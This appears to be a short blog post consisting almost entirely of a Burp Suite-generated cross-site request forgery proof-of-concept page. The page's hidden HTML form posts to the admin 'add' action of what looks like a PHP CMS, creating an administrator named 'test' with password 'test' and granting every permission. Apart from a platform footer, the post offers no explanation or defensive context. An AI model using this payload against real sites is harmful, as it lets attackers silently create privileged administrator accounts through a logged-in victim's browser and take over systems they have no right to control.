csrf page

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://127.0.0.1/3.gov.php/admin/ajax.php?type=admin&action=add&lang=undefined" method="POST">

      <input type="hidden" name="A&#95;login" value="test" />

      <input type="hidden" name="A&#95;pwd" value="test" />

      <input type="hidden" name="A&#95;type" value="1" />

      <input type="hidden" name="A&#95;a0" value="1" />

      <input type="hidden" name="A&#95;a1" value="1" />

      <input type="hidden" name="A&#95;a2" value="1" />

      <input type="hidden" name="A&#95;a3" value="1" />

      <input type="hidden" name="A&#95;a4" value="1" />

      <input type="hidden" name="A&#95;a5" value="1" />

      <input type="hidden" name="A&#95;a6" value="1" />

      <input type="hidden" name="A&#95;a8" value="1" />

      <input type="hidden" name="A&#95;a10" value="1" />

      <input type="hidden" name="A&#95;a7" value="1" />

      <input type="hidden" name="A&#95;a9" value="1" />

      <input type="hidden" name="A&#95;a11" value="1" />

      <input type="hidden" name="A&#95;textauth&#91;&#93;" value="2" />

      <input type="hidden" name="A&#95;textauth&#91;&#93;" value="1" />

      <input type="hidden" name="A&#95;textauth&#91;&#93;" value="all" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="117" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="115" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="112" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="109" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="7" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="1" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="113" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="110" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="106" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="104" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="107" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="105" />

      <input type="hidden" name="A&#95;newsauth&#91;&#93;" value="all" />

      <input type="hidden" name="A&#95;productauth&#91;&#93;" value="7" />

      <input type="hidden" name="A&#95;productauth&#91;&#93;" value="all" />

      <input type="hidden" name="A&#95;formauth&#91;&#93;" value="9" />

      <input type="hidden" name="A&#95;formauth&#91;&#93;" value="8" />

      <input type="hidden" name="A&#95;formauth&#91;&#93;" value="7" />

      <input type="hidden" name="A&#95;formauth&#91;&#93;" value="all" />

      <input type="hidden" name="A&#95;bbsauth&#91;&#93;" value="1" />

      <input type="hidden" name="A&#95;bbsauth&#91;&#93;" value="all" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容